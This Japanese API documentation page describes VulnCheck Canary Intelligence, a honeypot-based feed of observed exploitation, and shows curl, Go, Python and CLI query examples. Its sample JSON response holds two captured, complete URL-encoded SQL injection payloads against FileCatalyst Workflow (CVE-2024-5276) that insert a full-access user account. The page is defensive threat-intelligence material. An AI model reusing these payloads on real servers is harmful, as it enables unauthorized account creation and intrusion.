VulnCheck Canary Intelligenceは、インターネット上に実際に脆弱なシステムを展開し、実際の攻撃者の行動と悪用手法を捕捉します。このデータは、どの脆弱性が狙われているのか、どのように悪用されているのか、そして誰が悪用しているのかを明らかにします。防御担当者に早期かつ実用的な情報を提供します。
VulnCheck APIを使えば、VulnCheckエクスプロイト&脆弱性インテリジェンスを簡単に使い始めることができます。まずは、/v3/index/:index?cve=:cve APIを使ってvulncheck-canariesインデックスをクエリするだけです。以下のように実行してください。
curl --request GET \
--url https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276 \
--header 'Accept: application/json' \
--header 'Authorization: Bearer insert_token_here'
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
func main() {
configuration := vulncheck.NewConfiguration()
configuration.Scheme = "https"
configuration.Host = "api.vulncheck.com"
client := vulncheck.NewAPIClient(configuration)
token := os.Getenv("VULNCHECK_API_TOKEN")
auth := context.WithValue(
context.Background(),
vulncheck.ContextAPIKeys,
map[string]vulncheck.APIKey{
"Bearer": {Key: token},
},
)
resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Execute()
if err != nil || httpRes.StatusCode != 200 {
log.Fatal(err)
}
prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
if err != nil {
log.Fatalf("Failed to generate JSON: %v", err)
return
}
fmt.Println(string(prettyJSON))
}
import vulncheck_sdk
configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = "insert_token_here"
with vulncheck_sdk.ApiClient(configuration) as api_client:
indices_client = vulncheck_sdk.IndicesApi(api_client)
api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276")
print(api_response.data)
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276
上記の例では、vulncheck-canaries インデックスで CVE-2024-5276 に関する情報を検索します。
有効な CVE 識別子を使用して /v3/index/vulncheck-canaries?cve=:cve API エンドポイントを呼び出すと、次のような応答が返されます。
{
"_benchmark": 0.039542,
"_meta": {
"timestamp": "2025-10-22T11:35:36.982964726Z",
"index": "vulncheck-canaries",
// ...
},
"data": [
{
"src_ip": "34.133.225.171",
"src_port": 58376,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734cm3xr2dqiauaium96hrrzwmbd%27%2C+NULL%2C+%27986347D9E41AEE0835C341ED7DCA8B65%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdFirstName%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734cm3xr2dqiauaium96hrrzwmbd%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:32:24.338Z"
},
{
"src_ip": "34.16.7.161",
"src_port": 48334,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734ckkpr2kyqyslshjzytmsobunu%27%2C+NULL%2C+%277CE0027ED69C7ECA40D38289F18C6036%27%2C+%2734ckkpr2kyqyslshjzytmsobunuFirstName%27%2C+%2734ckkpr2kyqyslshjzytmsobunuLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734ckkpr2kyqyslshjzytmsobunu%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:17:55.908Z"
}
]
}
VulnCheck Canary Intelligence は、幅広いユースケースをサポートしています。
2 つの API クエリ パラメータ (CVE と日付) を組み合わせることで、特定の日付に悪用されている CVE をすばやく拡大表示できます。
curl --request GET \
--url https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276&date=2025-10-17 \
--header 'Accept: application/json' \
--header 'Authorization: Bearer insert_token_here'
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
func main() {
configuration := vulncheck.NewConfiguration()
configuration.Scheme = "https"
configuration.Host = "api.vulncheck.com"
client := vulncheck.NewAPIClient(configuration)
token := os.Getenv("VULNCHECK_API_TOKEN")
auth := context.WithValue(
context.Background(),
vulncheck.ContextAPIKeys,
map[string]vulncheck.APIKey{
"Bearer": {Key: token},
},
)
resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Date("2025-10-17").Execute()
if err != nil || httpRes.StatusCode != 200 {
log.Fatal(err)
}
prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
if err != nil {
log.Fatalf("Failed to generate JSON: %v", err)
return
}
fmt.Println(string(prettyJSON))
}
import vulncheck_sdk
configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = "insert_token_here"
with vulncheck_sdk.ApiClient(configuration) as api_client:
indices_client = vulncheck_sdk.IndicesApi(api_client)
api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276", date="2025-10-17")
print(api_response)
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276 --date 2025-10-17
| オフラインバックアップ | 説明 |
|---|---|
| vulncheck-canaries-3d | Canary Intelligence detections for the past 3 days |
| vulncheck-canaries-10d | Canary Intelligence detections for the past 10 days |
| vulncheck-canaries-30d | Canary Intelligence detections for the past 30 days |
| vulncheck-canaries-90d | Canary Intelligence detections for the past 90 days |
特定のオフライン バックアップを要求するには、次のように /v3/backup/:index を呼び出すだけです (以下に vulncheck-canaries-3d を示します)。
curl --request GET \
--url https://api.vulncheck.com/v3/backup/vulncheck-canaries-3d \
--header 'Accept: application/json' \
--header 'Authorization: Bearer insert_token_here'
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
func main() {
configuration := vulncheck.NewConfiguration()
configuration.Scheme = "https"
configuration.Host = "api.vulncheck.com"
client := vulncheck.NewAPIClient(configuration)
token := os.Getenv("VULNCHECK_API_TOKEN")
auth := context.WithValue(
context.Background(),
vulncheck.ContextAPIKeys,
map[string]vulncheck.APIKey{
"Bearer": {Key: token},
},
)
resp, httpRes, err := client.EndpointsAPI.BackupIndexGet(auth, "vulncheck-canaries-3d").Execute()
if err != nil || httpRes.StatusCode != 200 {
log.Fatal(err)
}
prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
if err != nil {
log.Fatalf("Failed to generate JSON: %v", err)
return
}
fmt.Println(string(prettyJSON))
}
import vulncheck_sdk
configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = "insert_token_here"
with vulncheck_sdk.ApiClient(configuration) as api_client:
endpoints_client = vulncheck_sdk.EndpointsApi(api_client)
api_response = endpoints_client.backup_index_get("vulncheck-canaries-3d")
print(api_response.data[0].url)
vulncheck backup download vulncheck-canaries-3d